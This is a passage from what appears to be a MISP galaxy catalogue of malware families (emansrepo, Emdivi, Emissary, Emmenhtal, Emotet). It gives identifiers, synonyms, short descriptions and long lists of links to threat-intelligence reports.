UUID 0be856c5-66ae-4ad7-bd8d-6794391d33f7
which can be used as unique global reference for emansrepo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Emdivi
Internal MISP references
UUID 6bf7aa6a-3003-4222-805e-776cb86dc78a
which can be used as unique global reference for Emdivi
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi - webarchive
- https://www.macnica.net/file/security_report_20160613.pdf - webarchive
- http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/ - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/ - webarchive
- https://securelist.com/new-activity-of-the-blue-termite-apt/71876/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Emissary
Internal MISP references
UUID a171f40a-85eb-4b64-af1d-8860a49b3b40
which can be used as unique global reference for Emissary
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Emmenhtal
Orange Cyberdefense assesses that this loader is highly likely used by multiple financially motivated threat actors since at least February 2024 to deploy commodity RATs and infostealers.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Emmenhtal.
Known Synonyms |
---|
IDATDropper |
PEAKLIGHT |
Internal MISP references
UUID 24d6cedb-a11b-4383-bdb2-3c6c5dcf0e05
which can be used as unique global reference for Emmenhtal
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.emmenhtal - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/ - webarchive
- https://www.orangecyberdefense.com/global/blog/cert-news/emmenhtal-a-little-known-loader-distributing-commodity-infostealers-worldwide - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/ - webarchive
- https://www.kroll.com/en/insights/publications/cyber/idatloader-distribution - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Emotet
While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid-2018 it has been used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets. It still steals information from victims, but the criminal gang behind it opened up another business channel by selling their infrastructure to deliver additional malicious software. Malware analysts have classified it into epochs based on command and control, payloads, and delivery mechanisms, which change over time. Emotet was taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Emotet.
Known Synonyms |
---|
Geodo |
Heodo |
Internal MISP references
UUID d29eb927-d53d-4af2-b6ce-17b3a1b34fe7
which can be used as unique global reference for Emotet
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet - webarchive
- https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/ - webarchive
- https://adalogics.com/blog/the-state-of-advanced-code-injections - webarchive
- https://blog.lumen.com/emotet-redux/ - webarchive
- https://spamauditor.org/2020/10/the-many-faces-of-emotet/ - webarchive
- https://community.riskiq.com/article/2cd1c003 - webarchive
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/ - webarchive
- https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure - webarchive
- https://muha2xmad.github.io/unpacking/emotet-part-1/ - webarchive
- https://blog.cyble.com/2022/04/27/emotet-returns-with-new-ttps-and-delivers-lnk-files-to-its-victims/ - webarchive
- https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/ - webarchive
- https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html - webarchive
- https://securelist.com/financial-cyberthreats-in-2020/101638/ - webarchive
- https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022 - webarchive
- https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ - webarchive
- https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates - webarchive
- https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html - webarchive
- https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/ - webarchive
- https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/ - webarchive
- https://github.com/d00rt/emotet_research - webarchive
- https://www.deepinstinct.com/blog/the-re-emergence-of-emotet - webarchive
- https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/ - webarchive
- https://github.com/cecio/EMOTET-2020-Reversing - webarchive
- https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/ - webarchive
- https://www.youtube.com/watch?v=8PHCZdpNKrw - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/ - webarchive
- https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/ - webarchive
- https://blog.vincss.net/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-emotet-samples/ - webarchive
- https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/ - webarchive
- https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure - webarchive
- https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation - webarchive
- https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled - webarchive
- https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/ - webarchive
- https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html - webarchive
- https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728 - webarchive
- https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html - webarchive
- https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/ - webarchive
- https://blogs.vmware.com/networkvirtualization/2022/02/emotet-is-not-dead-yet-part-2.html/ - webarchive
- https://www.netskope.com/blog/netskope-threat-coverage-the-return-of-emotet - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf - webarchive
- https://infosecwriteups.com/unpacking-emotet-trojan-dac7e6119a0a - webarchive
- https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf - webarchive
- https://de.darktrace.com/blog/emotet-resurgence-cross-industry-campaign-analysis - webarchive
- https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf - webarchive
- https://asec.ahnlab.com/en/33600/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques - webarchive
- https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection - webarchive
- https://www.infosecurity-magazine.com/blogs/a-rundown-of-the-emotet-malware/ - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware - webarchive
- https://www.tgsoft.it/files/report/download.asp?id=7481257469 - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker - webarchive
- https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/ - webarchive
- https://kienmanowar.wordpress.com/2022/01/23/quicknote-emotet-epoch4-epoch5-tactics/ - webarchive
- https://www.netresec.com/?page=Blog&month=2022-05&post=Emotet-C2-and-Spam-Traffic-Video - webarchive
- https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf - webarchive
- https://blog.threatlab.info/malware-analysis-emotet-infection/ - webarchive
- https://www.inde.nz/blog/analysis-of-the-latest-wave-of-emotet-malicious-documents - webarchive
- https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/ - webarchive
- https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/ - webarchive
- https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/ - webarchive
- https://www.gdatasoftware.com/blog/2022/01/malware-vaccines - webarchive
- https://www.youtube.com/watch?v=q8of74upT_g - webarchive
- https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/ - webarchive
- https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html - webarchive
- https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/ - webarchive
- https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/ - webarchive
- https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf - webarchive
- https://persianov.net/emotet-malware-analysis-part-1 - webarchive
- https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack - webarchive
- https://www.youtube.com/watch?v=cmJpRncrAp0 - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/ - webarchive
- https://threatresearch.ext.hp.com/emotets-return-whats-different/ - webarchive
- https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack - webarchive
- https://medium.com/@zyadlzyatsoc/comprehensive-analysis-of-emotet-malware-part-1-by-zyad-elzyat-35d5cf33a3c0 - webarchive
- https://www.hornetsecurity.com/en/security-information/emotet-is-back/ - webarchive
- https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/ - webarchive
- https://unit42.paloaltonetworks.com/new-emotet-infection-method/ - webarchive
- https://cyber.wtf/2021/11/15/guess-whos-back/ - webarchive
- https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html - webarchive
- https://blog.talosintelligence.com/emotet-switches-to-onenote/ - webarchive
- https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/ - webarchive
- https://blogs.vmware.com/networkvirtualization/2022/01/emotet-is-not-dead-yet.html/ - webarchive
- https://www.trendmicro.com/en_no/research/23/c/emotet-returns-now-adopts-binary-padding-for-evasion.html - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot - webarchive
- https://intezer.com/blog/research/how-hackers-use-binary-padding-to-outsmart-sandboxes/ - webarchive
- https://intel471.com/blog/conti-emotet-ransomware-conti-leaks - webarchive
- https://www.zscaler.com/blogs/security-research/return-emotet-malware - webarchive
- https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69 - webarchive
- https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns - webarchive
- https://experience.mandiant.com/trending-evil-2/p/1 - webarchive
- https://twitter.com/raashidbhatt/status/1237853549200936960 - webarchive
- https://shaddy43.github.io/MalwareAnalysisSeries/Emotet/ - webarchive
- https://www.anomali.com/blog/mummy-spiders-emotet-malware-is-back-after-a-year-hiatus-wizard-spiders-trickbot-observed-in-its-return - webarchive
- https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html - webarchive
- https://twitter.com/milkr3am/status/1354459859912192002 - webarchive
- https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/ - webarchive
- https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf - webarchive
- https://blogs.cisco.com/security/emotet-is-back - webarchive
- https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/ - webarchive
- https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://blogs.vmware.com/security/2022/05/emotet-moves-to-64-bit-and-updates-its-loader.html - webarchive
- https://muha2xmad.github.io/unpacking/emotet-part-2/ - webarchive
- https://www.digitalshadows.com/blog-and-research/emotet-disruption/ - webarchive
- https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/ - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128 - webarchive
- https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office - webarchive
- https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak - webarchive
- https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/ - webarchive
- https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/ - webarchive
- https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ - webarchive
- https://web.archive.org/web/20211223100528/https://cloudsek.com/emotet-2-0-everything-you-need-to-know-about-the-new-variant-of-thbanking-trojan/ - webarchive
- https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://www.esentire.com/security-advisories/emotet-activity-identified - webarchive
- https://research.checkpoint.com/emotet-tricky-trojan-git-clones/ - webarchive
- https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/ - webarchive
- https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-emotets-use-of-cryptography/ - webarchive
- https://twitter.com/eduardfir/status/1461856030292422659 - webarchive
- https://www.jpcert.or.jp/english/at/2019/at190044.html - webarchive
- https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles - webarchive
- https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus - webarchive
- https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/ - webarchive
- https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams - webarchive
- https://blog.talosintelligence.com/2020/11/emotet-2020.html - webarchive
- https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise - webarchive
- https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/ - webarchive
- https://securelist.com/the-chronicles-of-emotet/99660/ - webarchive
- https://www.youtube.com/watch?v=_mGMJFNJWSk - webarchive
- https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return - webarchive
- https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx - webarchive
- https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf - webarchive
- https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/ - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmwcb-report-modern-bank-heists-2020.pdf - webarchive
- https://speakerdeck.com/fr0gger/x-ray-of-malware-evasion-techniques-analysis-dissection-cure - webarchive
- https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html - webarchive
- https://unit42.paloaltonetworks.com/emotet-command-and-control/ - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2024-1209.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html - webarchive
- https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/ - webarchive
- https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89 - webarchive
- https://cert.grnet.gr/en/blog/reverse-engineering-emotet/ - webarchive
- https://www.lac.co.jp/lacwatch/alert/20211119_002801.html - webarchive
- https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/ - webarchive
- https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/ - webarchive
- https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/ - webarchive
- https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/ - webarchive
- https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/ - webarchive
- https://notes.netbytesec.com/2021/02/deobfuscating-emotet-macro-and.html - webarchive
- https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one - webarchive
- https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action - webarchive
- https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/ - webarchive
- https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break - webarchive
- https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff - webarchive
- https://blogs.vmware.com/security/2022/08/how-to-replicate-emotet-lateral-movement.html - webarchive
- https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/ - webarchive
- https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html - webarchive
- https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor - webarchive
- https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf - webarchive
- https://www.youtube.com/watch?v=5_-oR_135ss - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/ - webarchive
- https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/ - webarchive
- https://www.vmware.com/content/dam/learn/en/amer/fy23/pdf/1669005_Emotet_Exposed_A_Look_Inside_the_Cybercriminal_Supply_Chain.pdf - webarchive
- https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-crestwood - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet - webarchive
- https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612 - webarchive
- https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/ - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/ - webarchive
- https://hatching.io/blog/powershell-analysis - webarchive
- https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf - webarchive
- http://ropgadget.com/posts/defensive_pcres.html - webarchive
- https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/ - webarchive
- https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure - webarchive
- https://www.youtube.com/watch?v=EyDiIAt__dI - webarchive
- https://blogs.vmware.com/security/2022/05/emotet-config-redux.html - webarchive
- https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection - webarchive
- https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html - webarchive
- https://www.bleepingcomputer.com/news/security/emotet-botnet-switches-to-64-bit-modules-increases-activity/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.cert.pl/en/news/single/whats-up-emotet/ - webarchive
- https://threatpost.com/emotet-spreading-malicious-excel-files/178444/ - webarchive
- https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/ - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/ - webarchive
- https://intel471.com/blog/emotet-takedown-2021/ - webarchive
- https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage - webarchive
- https://www.kroll.com/en/insights/publications/cyber/monitor/emotet-analysis-new-lnk-in-the-infection-chain - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- https://unit42.paloaltonetworks.com/emotet-thread-hijacking/ - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers - webarchive
- https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html - webarchive
- https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html - webarchive
- https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de - webarchive
- https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/ - webarchive
- https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes - webarchive
- https://www.lac.co.jp/lacwatch/people/20201106_002321.html - webarchive
- https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5 - webarchive
- https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware - webarchive
- https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/ - webarchive
- https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf - webarchive
- https://unit42.paloaltonetworks.com/c2-traffic/ - webarchive
- https://twitter.com/Cryptolaemus1/status/1516535343281025032 - webarchive
- https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/ - webarchive
- https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code - webarchive
- https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/ - webarchive
- https://www.hornetsecurity.com/en/threat-research/comeback-emotet/ - webarchive
- https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships - webarchive
- https://persianov.net/emotet-malware-analysis-part-2 - webarchive
- https://www.bleepingcomputer.com/news/security/emotet-malware-attacks-return-after-three-month-break/ - webarchive
- https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/ - webarchive
- https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html - webarchive
- https://kienmanowar.wordpress.com/2022/12/19/z2abimonthly-malware-challege-emotet-back-from-the-dead/ - webarchive
- https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/ - webarchive
- https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/ - webarchive
- https://team-cymru.com/blog/2021/01/27/taking-down-emotet/ - webarchive
- https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/ - webarchive
- https://twitter.com/ContiLeaks/status/1498614197202079745 - webarchive
- https://feodotracker.abuse.ch/?filter=version_e - webarchive
- https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html - webarchive
- https://isc.sans.edu/diary/28044 - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf - webarchive
- https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/ - webarchive
- https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf - webarchive
- https://www.us-cert.gov/ncas/alerts/TA18-201A - webarchive
- https://news.sophos.com/en-us/2022/05/04/attacking-emotets-control-flow-flattening/ - webarchive
- https://www.youtube.com/watch?v=AkZ5TYBqcU4 - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf - webarchive
- https://pl-v.github.io/plv/posts/Emotet-unpacking/ - webarchive
- https://www.bitsight.com/blog/emotet-botnet-rises-again - webarchive
- https://www.intrinsec.com/emotet-returns-and-deploys-loaders/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return - webarchive
- https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction - webarchive
- https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/ - webarchive
- https://isc.sans.edu/diary/rss/27036 - webarchive
- https://cocomelonc.github.io/persistence/2023/12/10/malware-pers-23.html - webarchive
- https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/ - webarchive
- https://paste.cryptolaemus.com - webarchive
- https://www.atomicmatryoshka.com/post/malware-headliners-emotet - webarchive
- https://www.cert.pl/en/news/single/analysis-of-emotet-v4/ - webarchive
- https://www.dsih.fr/article/4483/emotet-de-retour-poc-exchange-0-day-windows-a-quelle-sauce-les-attaquants-prevoient-de-nous-manger-cette-semaine.html - webarchive
- https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/ - webarchive
- https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/ - webarchive
- https://www.bitsight.com/blog/emotet-smb-spreader-back - webarchive
- https://www.fortinet.com/blog/threat-research/ms-office-files-involved-again-in-recent-emotet-trojan-campaign-part-ii - webarchive
- https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/ - webarchive
- http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1 - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://cyber.wtf/2022/03/23/what-the-packer/ - webarchive
